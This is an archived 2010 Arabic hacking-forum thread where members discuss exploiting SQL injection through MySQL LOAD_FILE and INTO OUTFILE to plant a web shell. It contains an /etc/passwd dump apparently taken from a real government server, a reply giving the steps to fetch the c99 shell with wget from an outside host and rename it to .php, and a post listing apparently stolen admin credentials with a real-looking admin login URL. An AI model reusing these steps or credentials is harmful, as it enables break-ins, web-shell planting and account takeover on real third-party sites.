:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/f343.html)
-   -   كيف الاستفادة من امر LOAD_FILE('\') (http://www.vbspiders.com/vb/t31778.html)

TheGame 07-06-2010 05:07 AM

كيف الاستفادة من امر LOAD_FILE('\')
 
بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته

كيفكم شباب ان شاء الله بخير


ندخل في الموضوع اعتقد الموضوع واضح


كيف استفيد من الامر load_file('\')

مثلا عند اخراج مثل هذه المعلومات بالامر

/etc/password

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh dhcp:x:101:102::/nonexistent:/bin/false syslog:x:102:103::/home/syslog:/bin/false klog:x:103:104::/home/klog:/bin/false sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin eodi:x:1000:1000:eodi,,,:/home/eodi:/bin/bash ting:x:1001:1001:ting eodi,,,:/home/ting:/bin/bash mysql:x:105:114:MySQL Server,,,:/var/lib/mysql:/bin/false adminopdc:x:1002:1002:adminopdc,,,:/home/adminopdc:/bin/bash proftpd:x:106:65534::/var/run/proftpd:/bin/false ftp:x:107:65534::/home/ftp:/bin/false opdcmoi:x:1017:100:opdcmoi:/data/www/www.opdc.go.th/moi:/bin/sh goodpractice:x:1014:100:goodpractice:/data/www/www.opdc.go.th/goodpracticemodel:/bin/sh websiteopdc:x:1012:100:websiteopdc:/data/www/www.opdc.go.th:/bin/sh gcs:x:1010:100:gcs:/data/www/www.opdc.go.th/gcs:/bin/sh tkhpo:x:1009:100:tkhpo:/data/www/www.opdc.go.th/tkhpo:/bin/sh km:x:1008:100:km:/data/www/km.opdc.go.th:/bin/sh webmaster:x:1007:100:webmaster:/data/www/www.opdc.go.th:/bin/sh incentives50:x:1000:100:incentives50:/data/www/www.opdc.go.th/incentives50:/bin/sh munin:x:108:115::/var/lib/munin:/bin/false clamav:x:109:116::/var/lib/clamav:/bin/false postfix:x:110:118::/var/spool/postfix:/bin/false test:x:1003:100:test,test,,:/home/test:/bin/bash moiftp:x:1005:100:moiftp,,,:/data/www/moi.opdc.go.th:/bin/sh tkhpoftp:x:1006:100:tkhpoftp,,,:/data/www/tkhpo.opdc.go.th:/bin/sh gcsftp:x:1004:100:gcsftp,,,:/data/www/gcs.opdc.go.th/:/bin/sh incentives:x:1011:100:incentives,,,:/data/www/incentives.opdc.go.th:/bin/sh osmftp:x:1013:100:osm,,,:/data/www/osm.opdc.go.th:/bin/sh



وفي امر ثاني مجنني كلما اخترق موقع بثغرة SQL مااستفيد منه اي شي لان لا استطيع رفع الشل

وفي موضوع يقول لفولوكانو الى يضع مكان للابلود في الصفحة مافهمت منه اي شي واطبق مع لاكن بدون

فائدة وفي طريقة ثانية ايضا الي يقول into_file هيك شي لاكن المشكلة يقول لازم الماجك كوتس اوف

بس اليمحيرني الماجك كوتس يتخطى بالتشفير لاكن لماذا هذا لايتخطى انا قصدي موضوع حسين اكس

وارجو ان القا الاجابات المفرحة باذن الله وشكرا

mobdeen 07-06-2010 08:34 AM

وعليكم السلام ورحمة الله وبركاته

السؤال الاول وهو امر load_file('/')وتقوم بوضعه في الجدول المصاب فاذا ظهر لك خطأ فلا تستطيع ذلك اما اذا لم يظهر فيمكنك المتابعة بالحق واضافة ملف ثم رفع شل في الحقن
وانت عندما اظهرت يوزرات المواقع هذا ليس sql وانما remote file include
وبهذه تستطيع ايضا ان ترفع شل بالامر
wget www.xxxx.com/c99.txt
الاكسات تضع بدلها شل txt
ثم تقوم بالامر
mv c99.txt c99.php
وبهذا رفعت شل لكن ليس في كل المواقع تقبل رفع ش
(اذهب الى الدرس 8 في دورة استغلال الثغرات)

السؤال الثاني
انه ليس كل السكربتات المصابة وتدخل لوحة التحكم تسمح برفع شل فيها لاكن ليس كلهاا
واما عن into_file فهو تكملة للامر
load_file('/') وتضعه في نهاية الاستغلال وتضع الملف اللي ترفع عليه ويحب ان يكون عندك ملف عليه تصريح 777 وتستطيع معرفة ذلك عن طريق رؤية مجلد الصور والماجيك كوتس تظهره من اللود فايل كما قلت اذا ظهر خطأ فهذا مفعل اذا لم يظهر هذا اوف وبهذا تكون رفعت شلفدتك
واتمنى اني افدتك

TheGame 07-06-2010 12:11 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة mobdeen (المشاركة 164994)
وعليكم السلام ورحمة الله وبركاته

السؤال الاول وهو امر load_file('/')وتقوم بوضعه في الجدول المصاب فاذا ظهر لك خطأ فلا تستطيع ذلك اما اذا لم يظهر فيمكنك المتابعة بالحق واضافة ملف ثم رفع شل في الحقن
وانت عندما اظهرت يوزرات المواقع هذا ليس sql وانما remote file include
وبهذه تستطيع ايضا ان ترفع شل بالامر
wget www.xxxx.com/c99.txt
الاكسات تضع بدلها شل txt
ثم تقوم بالامر
mv c99.txt c99.php
وبهذا رفعت شل لكن ليس في كل المواقع تقبل رفع ش
(اذهب الى الدرس 8 في دورة استغلال الثغرات)

السؤال الثاني
انه ليس كل السكربتات المصابة وتدخل لوحة التحكم تسمح برفع شل فيها لاكن ليس كلهاا
واما عن into_file فهو تكملة للامرload_file('/') وتضعه في نهاية الاستغلال وتضع الملف اللي ترفع عليه ويحب ان يكون عندك ملف عليه تصريح 777 وتستطيع معرفة ذلك عن طريق رؤية مجلد الصور والماجيك كوتس تظهره من اللود فايل كما قلت اذا ظهر خطأ فهذا مفعل اذا لم يظهر هذا اوف وبهذا تكون رفعت شلفدتك
واتمنى اني افدتك


اخي العزيز هل قصدك وضع
wget www.xxxx.com/c99.txt في load_file('\')

يعني load_file('\
wget www.xxxx.com/c99.txt)


وماجاوبتني على اليوزرات ماذا استفاد منها




smilies5

mobdeen 07-06-2010 03:42 PM

اذا تريد ضغ رابط الموقع المصاب
مع الاستغلاللحتى نكمل لك
لانك شوية مش فاهم القصة

TheGame 07-06-2010 06:52 PM

اخي خذ هذا المثل تم استخراج اليوزر والباس لاكن مااستفدت اي شي منه


اليوزر: delider
الباسوورد: stormfury
وهذا لوحة التحكم

http://www.amaigabeko.com/admin/login.php

يعني معقولة كلما اخترق موقع بالـSQL مااقدر ارفع عليه شل

KaLa$nikoV 07-15-2010 01:05 PM

في شرح بقسم sql

كيف ترفع شل من هاي النقطه

(راجع المواضيع المثبته بقسم sql )

dr_hacker_0 11-06-2010 03:41 PM

l
الاكسات تضع بدلها شل txt
ثم تقوم بالامر
mv c99.txt c99.php

حياك الله اخي انا عندي نفس المشكلة وعندي سؤال اخي الفاضل

او نوعا ما اريد منك شرح سريعا لو كان امكن


هل نضع داك الامر ورابط الشل في العومد المصاب متلا اخي

انا عندي موقع مصاب نعتبر

www.yyy.com=1,2,3,4,5,6-

العمود الرابع هو المصاب هل نضع الامر الدي كتبت مع رابط الشل في العمود المصاب ؟


الساعة الآن 08:46 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0